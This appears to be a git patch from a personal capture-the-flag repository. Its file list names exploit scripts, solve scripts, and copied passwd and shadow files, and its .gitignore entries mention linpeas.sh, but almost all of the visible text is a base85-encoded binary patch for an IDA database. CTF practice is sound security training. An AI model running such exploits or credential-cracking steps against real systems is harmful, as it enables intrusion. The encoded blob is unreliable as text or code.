From d90e4ede1a11e78c8668abfe1ddbd1d0ea34da58 Mon Sep 17 00:00:00 2001 From: cato447 Date: Fri, 12 Jun 2026 00:36:55 +0200 Subject: [PATCH] updates people updates --- .gitignore | 2 + 2026/cscg/pwn/canopysaurus/ecu_sim.i64 | Bin 0 -> 455956 bytes ...879274b7cf2a2237156a517d3e143a969.apk.jadx | 149 -- .../mobile/peaky_binders/writeup.md | 136 +- 2026/kalmar/misc/git-hoarder/exploit.sh | 5 +- 2026/usd_hackertag/freya/crack_input | 31 + 2026/usd_hackertag/freya/exploit.py | 105 + 2026/usd_hackertag/freya/out.txt | 2083 +++++++++++++++++ 2026/usd_hackertag/freya/passwd | 31 + 2026/usd_hackertag/freya/shadow | 31 + 2026/usd_hackertag/maxwell/notes.md | 37 + .../htb/challenges/rev/encrypted_data.txt | 1 + training/htb/challenges/rev/ircware | Bin 0 -> 5368 bytes training/htb/challenges/rev/ircware.i64 | Bin 0 -> 189115 bytes training/htb/challenges/rev/solve | Bin 0 -> 16064 bytes training/htb/challenges/rev/solve.c | 42 + training/htb/challenges/rev/solve.py | 25 + 17 files changed, 2462 insertions(+), 216 deletions(-) create mode 100644 2026/cscg/pwn/canopysaurus/ecu_sim.i64 delete mode 100644 2026/insomnihack/mobile/peaky_binders/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk.jadx mode change 100644 => 100755 2026/kalmar/misc/git-hoarder/exploit.sh create mode 100644 2026/usd_hackertag/freya/crack_input create mode 100644 2026/usd_hackertag/freya/exploit.py create mode 100644 2026/usd_hackertag/freya/out.txt create mode 100644 2026/usd_hackertag/freya/passwd create mode 100644 2026/usd_hackertag/freya/shadow create mode 100644 2026/usd_hackertag/maxwell/notes.md create mode 100644 training/htb/challenges/rev/encrypted_data.txt create mode 100644 training/htb/challenges/rev/ircware create mode 100644 training/htb/challenges/rev/ircware.i64 create mode 100755 training/htb/challenges/rev/solve create mode 100644 training/htb/challenges/rev/solve.c create mode 100644 training/htb/challenges/rev/solve.py diff --git a/.gitignore b/.gitignore index 6e40c31..a12d44e 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,5 @@ .venv/ __pycache__/ core.* +/2026/usd_hackertag/ovpn_HT26MU06.conf +/2026/usd_hackertag/freya/linpeas.sh diff --git a/2026/cscg/pwn/canopysaurus/ecu_sim.i64 b/2026/cscg/pwn/canopysaurus/ecu_sim.i64 new file mode 100644 index 0000000000000000000000000000000000000000..c8a360e2a65ccacfe831eb493b1eda06f6e313c0 GIT binary patch literal 455956 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 